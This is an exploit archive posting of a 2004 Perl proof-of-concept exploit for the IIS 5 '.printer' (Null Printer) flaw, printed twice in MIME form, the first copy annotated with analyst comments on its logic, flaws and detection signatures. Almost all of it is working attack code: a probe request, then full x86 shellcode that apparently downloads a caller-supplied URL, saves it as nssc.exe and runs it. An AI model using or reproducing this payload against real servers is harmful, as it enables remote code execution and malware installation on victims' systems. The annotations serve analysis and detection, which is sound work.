
iis.pl.txt

iis.pl.txt
Posted Oct 26, 2004
Authored by Diabolic Crab | Site digitalparadox.org

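IIS 5 null pointer proof of concept exploit. (The script's own banner calls it the "IIS 5 Null Printer Exploit" and it requests /NULL.printer, so "null pointer" here is probably a slip for "Null Printer".)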

tags | exploit, proof of concept
SHA-256 | 80e021ee49bc8b8c86efd67d2904ce71e04ef0648b422b39cee57bf1dfef4527

iis.pl.txt

This is a multi-part message in MIME format.

------=_NextPart_000_001D_01C4B563.F871BDD0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

http://icis.digitalparadox.org/~dcrab/iis.pl=20
#!/usr/bin/perl -w
use IO::Socket;
# Proof-of-concept client. It probes a web server on TCP port 80 with a
# GET /NULL.printer request and, unless the reply contains an exact
# "Bad Request" heading line, opens a second connection and sends a
# binary payload (the @shell list further down).
# The listing is shown as mailed (quoted-printable transfer encoding),
# not as runnable Perl.
# NOTE(review): no "use strict"; every variable is a package global.

# Banner only: author credits and site names, no functional effect.
print "\n#############################################\n";
print "#IIS 5 Null Printer Exploit by Diabolic Crab#\n";
print "# Shouts to Mr.J Zinho Subby Sync #\n";
print "# Fluidmotion Haking Ta|0n Pheonix #\n";
print "# Phreaked Bread Moth Volcom Sany #\n";
print "# Defcon Ref0rm and everyone els #\n";
print "# C0replay, Hackerscenter, dP #\n";
print "# www.hackerscenter.com #\n";
print "# www.digitalparadox.org #\n";
print "\#############################################\n";
# Two arguments are required: the target host name and the value the
# usage text calls "filetodownload" (stored in $url below). Neither is
# validated beyond this truthiness test.
unless ($ARGV[0]) {
print "\n#Usage: $0 hostname filetodownload#\n";
exit();
}
unless ($ARGV[1]) {
print "\n#Usage: $0 hostname filetodownload#\n";
exit();
}
# First connection: plain TCP to port 80 with a 10 second timeout.
$socket =3D IO::Socket::INET->new(
Proto =3D> 'tcp',
PeerAddr =3D> $ARGV[0],
PeerPort =3D> 80,
Timeout =3D> 10,
);
# $bish is the "server answered Bad Request" flag; $url is later placed
# verbatim inside the payload list.
$bish =3D 0;
$url =3D $ARGV[1];
print "#Connecting to $ARGV[0]\n";
# new() returns a false value on failure. die() already terminates the
# script, so the exit() after it is never reached.
unless($socket) {
die("#Could not connect to $ARGV[0]:80\n");
exit();
}
print "#Connection Established\n";
$socket->autoflush(1);
# Probe request. Detection note: it asks for /NULL.printer and carries
# the fixed header value Client-Agent:IIS_Printer_Scan; both strings are
# usable as signatures in web server logs and IDS rules.
print $socket ("GET /NULL.printer=20
HTTP/1.1\nClient-Agent:IIS_Printer_Scan\nHost:$ARGV[0]\r\n\r\n");
print "#Packet sent\n";
# Reads reply lines until the peer closes the connection (no read
# timeout is set here). Lines returned by <$socket> keep their line
# terminator, so the eq test below matches only when the exact heading
# text arrives as a line with no trailing newline. In every other case
# $bish stays 0 and the target is later reported as exploitable, so the
# verdict printed by this script is not a reliable vulnerability check.
while ($line =3D <$socket>) {
if ($line eq "<h1>Bad Request</h1>") {
$bish =3D 1
}
}
# Payload branch: taken whenever the probe loop did not set $bish to 1.
if ($bish ne 1) {
print "#Server seems to be exploitable\n";
# @shell is the list of strings sent on the second connection: a bare
# newline, a second GET /NULL.printer request line, binary chunks, the
# caller-supplied $url (interpolated unvalidated from the second
# command-line argument) and a two-byte trailer.
# Analyst note: the last chunks are readable ASCII separated by 0x08
# bytes. They spell the DLL names kernel32.dll and wininet.dll, the
# API names GetModuleHandleA, GetProcAddress, LoadLibraryA, _lcreat,
# _lwrite, GlobalAlloc, _lclose, WinExec, ExitProcess, InternetOpenA,
# InternetOpenUrlA, InternetReadFile and InternetCloseHandle, and the
# strings NS and nssc.exe.
# NOTE(review): that set is consistent with a download-and-run stage
# (fetch $url, write it to nssc.exe, start it). This is inferred from
# the embedded names only; the code bytes were not disassembled here.
# Detection: look for a file named nssc.exe on the web server and for
# outbound HTTP from that host shortly after a /NULL.printer request.
@shell =3D ("\n","GET /NULL.printer HTTP/1.1\n" ,=20
"\xEB\x30\x5F\xFC\x8B\xF7\x80"
,"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB=
2\x04\xC1"
,"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB=
2\x7C\x8B"
,"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF=
8\x8B\x40"
,"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0=
C\x03\x7D"
,"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8=
B\xF8\x33"
,"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7=
A\x03\x80"
,"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x5=
1\xF3\xA6"
,"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC=
1\xE0\x02"
,"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x4=
0\x3C\x03"
,"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF=
0\xAD\x03"
,"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xF=
C\x8D\x76"
,"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5=
E\x74\x06"
,"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0=
E\xEB\x02"
,"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5=
D\xFC\x8D"
,"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x4=
5\xE4\xFC"
,"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x4=
3\xE2\xE1"
,"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x5=
3\x51\x53"
,"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x4=
3\xEB\xF9"
,"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD=
4\xFF\xD0"
,"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xF=
F\xD0\x8D"
,"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x5=
2\x8D\x7B"
,"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB=
6\x1F\xC1"
,"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8=
B\x45\xB4"
,"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xD=
C\xFF\xD0"
,"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8=
B\x55\xA4"
,"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xC=
C\xFF\xD0"
,"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6=
F\x64\x75"
,"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x3=
2\x2E\x64"
,"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x0=
8\x4C\x6F"
,"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x7=
4\x08\x5F"
,"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x6=
3\x08\x5F"
,"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x6=
9\x74\x50"
,"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6=
C\x08\x49"
,"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x7=
2\x6E\x65"
,"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x7=
4\x52\x65"
,"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6=
F\x73\x65"
,"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x6=
5\x08"
,"$url"
,"\x08\x01");
# Second connection to the same host and port. Unlike the first one,
# the result of new() is not checked before it is used.
$socket2 =3D IO::Socket::INET->new(
Proto =3D> 'tcp',
PeerAddr =3D> $ARGV[0],
PeerPort =3D> 80,
Timeout =3D> 10,
);
# Each list element goes out in its own send() call with a one second
# pause after it; a failed send ends the script via die.
foreach $ms(@shell) {
send($socket2, $ms, 0) or die "\n[x] #Unable to send exploit: $!";
sleep(1);
}
# Status messages only: the script reads no reply on this connection
# and performs no download or success check of its own.
print "#Attempting to download file\n";
print "#Exploit sent\n";
# NOTE(review): this names a bareword handle called socket2, not the
# object held in $socket2, so that object is not closed by this call.
close(socket2);
}
# Printed only when the reply loop set $bish to 1, that is, when it saw
# the exact Bad Request heading line in the probe response.
if ($bish eq 1) {
print "#Server seems to be not exploitable\n";
}
# exit() with no argument returns status 0, so the exit code does not
# distinguish the two verdicts.
exit();

------=_NextPart_000_001D_01C4B563.F871BDD0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2523" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2><!--StartFragment --><FONT =
face=3D"Times New Roman"=20
size=3D3><FONT face=3DArial size=3D2><A=20
href=3D"http://icis.digitalparadox.org/~dcrab/iis.pl">http://icis.digital=
paradox.org/~dcrab/iis.pl</A></FONT>&nbsp;</FONT><PRE>#!/usr/bin/perl -w
use IO::Socket;
print "\n#############################################\n";
print "#IIS 5 Null Printer Exploit by Diabolic Crab#\n";
print "# Shouts to Mr.J Zinho Subby Sync #\n";
print "# Fluidmotion Haking Ta|0n Pheonix #\n";
print "# Phreaked Bread Moth Volcom Sany #\n";
print "# Defcon Ref0rm and everyone els #\n";
print "# C0replay, Hackerscenter, dP #\n";
print "# www.hackerscenter.com #\n";
print "# www.digitalparadox.org #\n";
print "\#############################################\n";
unless ($ARGV[0]) {
print "\n#Usage: $0 hostname filetodownload#\n";
exit();
}
unless ($ARGV[1]) {
print "\n#Usage: $0 hostname filetodownload#\n";
exit();
}
$socket =3D IO::Socket::INET->new(
Proto =3D> 'tcp',
PeerAddr =3D> $ARGV[0],
PeerPort =3D> 80,
Timeout =3D> 10,
);
$bish =3D 0;
$url =3D $ARGV[1];
print "#Connecting to $ARGV[0]\n";
unless($socket) {
die("#Could not connect to $ARGV[0]:80\n");
exit();
}
print "#Connection Established\n";
$socket->autoflush(1);
print $socket ("GET /NULL.printer=20
HTTP/1.1\nClient-Agent:IIS_Printer_Scan\nHost:$ARGV[0]\r\n\r\n");
print "#Packet sent\n";
while ($line =3D <$socket>) {
if ($line eq "<h1>Bad Request</h1>") {
$bish =3D 1
}
}
if ($bish ne 1) {
print "#Server seems to be exploitable\n";
@shell =3D ("\n","GET /NULL.printer HTTP/1.1\n" ,=20
"\xEB\x30\x5F\xFC\x8B\xF7\x80"
,"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB=
2\x04\xC1"
,"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB=
2\x7C\x8B"
,"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF=
8\x8B\x40"
,"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0=
C\x03\x7D"
,"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8=
B\xF8\x33"
,"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7=
A\x03\x80"
,"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x5=
1\xF3\xA6"
,"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC=
1\xE0\x02"
,"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x4=
0\x3C\x03"
,"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF=
0\xAD\x03"
,"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xF=
C\x8D\x76"
,"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5=
E\x74\x06"
,"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0=
E\xEB\x02"
,"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5=
D\xFC\x8D"
,"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x4=
5\xE4\xFC"
,"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x4=
3\xE2\xE1"
,"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x5=
3\x51\x53"
,"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x4=
3\xEB\xF9"
,"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD=
4\xFF\xD0"
,"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xF=
F\xD0\x8D"
,"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x5=
2\x8D\x7B"
,"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB=
6\x1F\xC1"
,"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8=
B\x45\xB4"
,"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xD=
C\xFF\xD0"
,"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8=
B\x55\xA4"
,"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xC=
C\xFF\xD0"
,"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6=
F\x64\x75"
,"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x3=
2\x2E\x64"
,"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x0=
8\x4C\x6F"
,"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x7=
4\x08\x5F"
,"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x6=
3\x08\x5F"
,"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x6=
9\x74\x50"
,"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6=
C\x08\x49"
,"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x7=
2\x6E\x65"
,"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x7=
4\x52\x65"
,"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6=
F\x73\x65"
,"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x6=
5\x08"
,"$url"
,"\x08\x01");
$socket2 =3D IO::Socket::INET->new(
Proto =3D> 'tcp',
PeerAddr =3D> $ARGV[0],
PeerPort =3D> 80,
Timeout =3D> 10,
);
foreach $ms(@shell) {
send($socket2, $ms, 0) or die "\n[x] #Unable to send exploit: $!";
sleep(1);
}
print "#Attempting to download file\n";
print "#Exploit sent\n";
close(socket2);
}
if ($bish eq 1) {
print "#Server seems to be not exploitable\n";
}
exit();
</PRE></FONT></DIV></BODY></HTML>

------=_NextPart_000_001D_01C4B563.F871BDD0--